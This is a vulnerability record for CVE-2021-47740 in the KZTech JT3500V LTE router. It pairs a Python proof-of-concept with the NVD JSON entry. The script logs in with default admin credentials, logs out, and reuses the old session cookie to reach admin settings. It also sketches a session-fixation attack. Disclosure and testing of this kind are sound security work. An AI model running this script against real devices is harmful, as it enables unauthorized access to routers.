CVE-2021-47740

#!/usr/bin/env python3 """ CVE-2021-47740 PoC - KZTech JT3500V Session Management Vulnerability This PoC demonstrates session reuse without proper expiration. """ import requests import sys TARGET_IP = "192.168.1.1" # Default CPE IP TARGET_URL = f"http://{TARGET_IP}" def check_session_management(): """ Test for weak session management vulnerability. Checks if session cookies remain valid after logout. """ session = requests.Session() # Step 1: Normal login login_data = { "username": "admin", "password": "admin" # Default credentials } try: response = session.post(f"{TARGET_URL}/login", data=login_data, timeout=5) print(f"[+] Login attempt: Status {response.status_code}") # Extract session cookie session_cookie = session.cookies.get_dict() print(f"[+] Session cookie obtained: {session_cookie}") # Step 2: Logout logout_response = session.post(f"{TARGET_URL}/logout", timeout=5) print(f"[+] Logout attempt: Status {logout_response.status_code}") # Step 3: Try to reuse the same session cookie reused_session = requests.Session() reused_session.cookies.update(session_cookie) protected_response = reused_session.get(f"{TARGET_URL}/admin/settings", timeout=5) if protected_response.status_code == 200: print("[!] VULNERABLE: Session cookie still valid after logout!") print("[+] Attacker can maintain unauthorized access") return True else: print("[-] NOT VULNERABLE: Session properly invalidated") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None def exploit_session_fixation(): """ Demonstrate session fixation attack. Attacker sets a known session ID before victim authenticates. """ attacker_session = requests.Session() # Attacker pre-creates a session initial_response = attacker_session.get(f"{TARGET_URL}/", timeout=5) attacker_cookie = attacker_session.cookies.get_dict() print(f"[+] Attacker sets known session: {attacker_cookie}") # If victim uses this cookie, attacker can hijack print("[+] Victim authenticates with attacker-provided session") print("[+] Attacker reuses session to gain access") if __name__ == "__main__": print("=" * 60) print("CVE-2021-47740 - KZTech JT3500V Session Management PoC") print("=" * 60) check_session_management()

{"cve": {"id": "CVE-2021-47740", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:42.103", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "KZTech JT3500V 4G LTE CPE 2.0.1 contains a session management vulnerability that allows attackers to reuse old session credentials without proper expiration. Attackers can exploit the weak session handling to maintain unauthorized access and potentially compromise device authentication mechanisms."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "references": [{"url": "http://www.kzbtech.com/", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/198471", "source": "[email protected]"}, {"url": "https://neotel.mk/", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/161892/", "source": "[email protected]"}, {"url": "https://www.jatontech.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/kztech-jtv-g-lte-cpe-insufficient-session-expiration-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5646.php", "source": "[email protected]"}]}}